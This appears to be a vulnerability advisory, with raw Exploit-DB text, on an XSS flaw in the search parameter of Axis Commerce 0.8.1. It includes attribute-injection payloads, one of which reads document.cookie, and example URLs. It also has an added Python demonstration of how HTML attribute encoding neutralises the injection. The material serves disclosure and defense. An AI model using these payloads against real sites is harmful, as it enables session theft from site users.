Vendor: Axis Commerce (E-Commerce System)
By: Eyup CELIK
CVSS: 7.5 (HIGH)
Stored XSS
CWE: 79
Product Name: Axis Commerce (E-Commerce System)
Affected Version From: 0.8.1 and previous
Affected Version To: 0.8.1 and previous
Patch Exists: NO
Related CWE: N/A
CPE: axis/axiscommerce/axis-0.8.1.zip
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache (For Windows)
2011

Axis Commerce (E-Commerce System) Stored XSS

The Search module is vulnerable to XSS through the search input (the q parameter of /search/result). Example payload: 'onmouseover=prompt(XSS Code) bad='. Example URLs: http://localhost/axis-0.7.0.4/search/result?q='onmouseover=prompt(906764) bad=' and http://localhost/axis-0.7.0.4/search/result?q='onmouseover=prompt(document.cookie) bad='.
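The following is an added example, not code from the advisory or from Axis Commerce: it shows why the payload above turns into an event-handler attribute and how attribute-context encoding stops that, for both the single-quote and double-quote forms that appear on this page. It assumes the search term is echoed into a quoted value attribute of an input tag (the advisory does not show the actual sink); the templates and function names are hypothetical.

```python
from html import escape
from html.parser import HTMLParser

# Constructed payloads in the shape the advisory gives, one per quote style.
PAYLOADS = ['" onmouseover=prompt(906764) bad="',
            "' onmouseover=prompt(906764) bad='"]

# Hypothetical templates (assumption): the real sink is not shown in the advisory.
TEMPLATES = {'"': '<input type="text" name="q" value="{q}">',
             "'": "<input type='text' name='q' value='{q}'>"}


class AttrCollector(HTMLParser):
    """Records the attributes an HTML parser sees on the <input> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def render(q, quote, encode):
    """Place q in the attribute, with or without HTML attribute encoding."""
    value = escape(q, quote=True) if encode else q  # encodes & < > " and '
    return TEMPLATES[quote].format(q=value)


def parsed_attrs(markup):
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_handlers(q, quote, encode):
    """Names of on* attributes that exist after parsing the rendered tag."""
    return sorted(k for k in parsed_attrs(render(q, quote, encode))
                  if k.startswith("on"))


if __name__ == "__main__":
    for payload, quote in zip(PAYLOADS, TEMPLATES):
        for encode in (False, True):
            print(quote, "encoded" if encode else "raw",
                  injected_handlers(payload, quote, encode))
```

In a PHP application the equivalent encoding call is htmlspecialchars($q, ENT_QUOTES, 'UTF-8'); without ENT_QUOTES, PHP versions before 8.1 leave single quotes unencoded and a single-quoted attribute stays exposed.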

Mitigation:

No solution
Source

Exploit-DB raw data:

# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
# Version: 0.8.1 and previous
# Tested on: Apache (For Windows)

ISSUE

Vulnerable Modules => Search Module

XSS can be done using the command input

Example Code: " onmouseover=prompt(XSS Code) bad="

Example:

http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="

http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="